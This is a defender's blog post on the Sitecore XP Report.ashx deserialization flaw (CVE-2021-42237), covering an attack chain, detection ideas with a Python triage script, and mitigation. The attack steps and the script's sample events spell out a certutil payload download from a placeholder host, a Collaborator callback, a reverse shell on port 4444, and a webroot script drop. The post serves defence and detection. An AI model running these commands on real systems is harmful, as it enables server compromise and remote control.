A Defender’s Perspective of Sitecore XP Deserialization RCE (CVE-2021-42237)

Kai Iyer, Nerd For Tech
Apr 8, 2022


Sitecore’s Experience Platform (XP) is a .NET enterprise content management system (CMS). Sitecore XP provides tools for content management, digital marketing, and analytics and reporting.

CVE-2021-42237

Sitecore XP versions from 7.5 Initial Release through 8.2 Update-7 are vulnerable to an insecure deserialization attack that allows remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.

Key Concepts before getting started

Insecure Deserialization

Serialization is the conversion of an object into a static stream of bytes, which can be saved to a database or transferred over a network. Deserialization is the reverse of that process, reconstructing a data structure or object from a stream of bytes.

The vulnerability occurs when untrusted data is deserialized and used to abuse the logic of an application, inflict a denial of service (DoS), or even execute arbitrary code.
When user-controllable data is deserialized by a website, an attacker can potentially manipulate serialized objects to pass harmful data into the application code.

Web Shell

A web shell is typically a small piece of malicious code written in a common web development language (e.g., ASP, PHP, JSP) that attackers implant on web servers to gain remote access and code execution on the server.

An IIS worker process (w3wp.exe) spawning suspicious child processes such as ‘cmd.exe /c echo’, ‘certutil.exe’, or ‘powershell.exe’ that result in the creation of script files in web-accessible folders is a rare event and is typically a strong sign of web shell activity.

Burp Collaborator

A network service that Burp Suite uses to help discover many kinds of vulnerabilities, in particular those that only manifest as out-of-band network interactions.
The Collaborator client can be used to generate payloads for manual testing and to poll the Collaborator server for any network interactions (DNS, HTTP) that result from using those payloads.

CertUtil

A Windows binary used for handling certificates.

The intended usage of certutil is to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, or certificate chains. However, attackers can also use the tool to fetch data from the Internet using a URL scheme (ftp://, http://, etc.).

What a typical attack would look like

  1. Sitecore XP uses insecure deserialization in the Report.ashx handler, which an attacker can leverage to execute arbitrary code on the system.
  2. Scanning attempts against the vulnerable server:
     URI: “/sitecore/shell/ClientBin/Reporting/Report.ashx”
  3. nslookup from the endpoint towards a burpcollaborator domain (an out-of-band check that code execution worked):
     nslookup 5ouceXYZQtem.burpcollaborator.net
  4. Payload download:
     “C:\Windows\System32\cmd.exe” /c certutil -urlcache -f https://5ouceXYZQtem.burpcollaborator.net
     certutil -f -urlcache http://A.B.C.D:8000/file.exe C:\Windows\Temp\file.exe
  5. Reverse shell:
     C:\Windows\Temp\file.exe A.B.C.D 4444 -e cmd

By successfully exploiting this vulnerability, an attacker gains arbitrary code execution as the user running the IIS worker process. The attacker can then use the “getsystem” command, which relies on RPCSS impersonation, to obtain SYSTEM-level code execution.

Ideas for Detection

  1. Suspicious usage of certutil
    Identify certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL. Link for Sigma rule.
  2. Suspicious nslookup traffic
    nslookup.exe execution with a query towards a *.burpcollaborator.net domain
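As an added example (not part of the original post), the two detection ideas above plus the w3wp.exe parent-child indicator from the Web Shell section, expressed as triage rules run over constructed process-creation events. The event field names (parent, image, cmdline), the rule names and the sample events are assumptions; the commands in the samples mirror the attack chain described above.

```python
import re
from typing import Dict, List

# Hypothetical field names for a process-creation event (Sysmon Event ID 1 style).
IIS_WORKER = "w3wp.exe"
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "nslookup.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
COLLAB_RE = re.compile(r"\b[\w.-]+\.burpcollaborator\.net\b", re.IGNORECASE)
# Output redirection into a web-accessible folder with a server-side script extension.
WEBROOT_DROP_RE = re.compile(
    r">\s*\S*\\(?:inetpub|wwwroot|sitecore)\\\S+\.(?:aspx?|ashx)\b", re.IGNORECASE)

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c certutil -urlcache -f http://A.B.C.D:8000/file.exe C:\Windows\Temp\file.exe'},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup 5ouceXYZQtem.burpcollaborator.net"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -dump cert.cer"},  # benign: an admin inspecting a certificate
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo test > C:\inetpub\wwwroot\sitecore\shell\x.aspx"},
]

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def triage(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list = clean)."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event["cmdline"]
    lowered = cmd.lower()
    hits: List[str] = []
    if parent == IIS_WORKER and image in LOLBIN_CHILDREN:
        hits.append("iis_spawned_lolbin")          # rare for a CMS worker process
    if "certutil" in lowered and "-urlcache" in lowered and URL_RE.search(cmd):
        hits.append("certutil_url_fetch")          # certutil used as a downloader
    if image == "nslookup.exe" and COLLAB_RE.search(cmd):
        hits.append("collaborator_dns_callback")   # out-of-band callback check
    if "echo" in lowered and WEBROOT_DROP_RE.search(cmd):
        hits.append("script_written_to_webroot")   # possible web shell drop
    return hits

def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each alerting event to its rule hits; clean events are omitted."""
    return {i: hits for i, ev in enumerate(events) if (hits := triage(ev))}

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"][:60], "->", ", ".join(rules))
```

The benign certutil -dump event is included to show that the rules key on the download switch and URL, not on certutil.exe alone.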

Mitigation

The recommended solution is to upgrade to a secure version, ideally Sitecore XP 9.0 or higher. Alternatively, the flaw can be mitigated by deleting the Report.ashx file at “/sitecore/shell/ClientBin/Reporting/Report.ashx” on all server instances.

References

https://blog.assetnote.io/2021/11/02/sitecore-rce/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42237
https://lolbas-project.github.io/lolbas/Binaries/Certutil/
